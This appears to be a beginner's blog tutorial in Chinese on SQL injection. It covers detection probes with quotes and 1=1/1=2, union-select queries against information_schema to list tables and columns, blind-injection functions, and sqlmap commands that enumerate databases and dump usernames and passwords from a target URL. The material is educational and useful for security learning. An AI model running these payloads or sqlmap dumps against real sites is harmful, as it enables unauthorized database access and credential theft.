天天看点

初试SQL注入攻击SQL注入——小白入门预备知识

SQL注入——小白入门预备知识

什么是SQL注入攻击:

  • SQL注入(Sql Injection):是一种十分流行的脚本攻击,能严重危害数据库安全的攻击。其是将用户输入的数据作为恶意SQL语句注入的途径,拼接到数据库的SQL语句中,被当做SQL语句的一部分执行。

哪里能进行SQL注入呢?

  • 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入,如URL、用户输入栏、评论区等等。

SQL注入的分类:

1、带内(In-band)SQLi,也叫经典SQLi

2、推测SQL注入(盲注)

3、带外SQLi

(参考:https://blog.csdn.net/caiqiiqi/article/details/102987856)

检测是否存在SQL注入漏洞:

  • 若想要进行SQL注入攻击当然得先查看存不存在SQL注入漏洞,我们在输入框输入单引号’或者双引号",若返回错误则存在该漏洞(提示单引号或者双引号个数不匹配);也可以通过URL传入参数:and1=1和and 1=2来进行判断,若传入and 1=1正常,输入and1=2发返回错误则存在数字型SQL注入漏洞(逻辑判断1=1为真,1=2为假);同理输入and ‘1’='1’和and ‘1’='2’进行同样的操作,判断字符型SQL注入漏洞是否存在。

必须知道的SQL语句:

1=1,1=2(判断真假);

order by X;

database(),user(),version();

union select null,null,…();

length(database())>=1;

substr(database(),1,1)=‘a’;

sleep(1);

…等等(啥意思百度一下就知道)

Information_schema库的使用:

(详细请查看https://blog.csdn.net/lxy320826/article/details/101398841)

首先,table_schema,table_name,column_name分别是库名表名列名,这是比较常用的列名;group_concat()是一个返回组的连接的函数;

我们可以通过:

  1. union select group_concat(table_name) from information_schema.tables

    where table_schema=‘xxx’ #获得xxx数据库的表名

  2. union select group_concat(column_name) from

    information_schema.columns where table_schema=‘xxx’ #获得xxx数据库的列名

有了表名和列名对后续的操作就方便了,想查什么就查什么。

学习并使用工具来节省时间:

(安装教程:https://blog.csdn.net/cqs394235616/article/details/106283059)

如sqlmap,其中最常用也最基础的语句:

python sqlmap.py -u URL(如http://abc.com/xxx.php?id=1) #查找注入点;

python sqlmap.py -u URL --dbs #获取所有数据库

python sqlmap.py -u URL --/users/passwords/current-user/current-db#获取数据库所有用户/密码/当前网站数据库的用户名称/当前网站数据库的名称

python sqlmap.py -u URL -D xx --tables #获取数据库xx的所有表名

python sqlmap.py -u URL -D xx -T yy --columns #获取xx数据库yy表的所有字段

python sqlmap.py -u URL -D xx -T yy -C id,username,password --dump #同理指定库名表名字段,dump出指定字段信息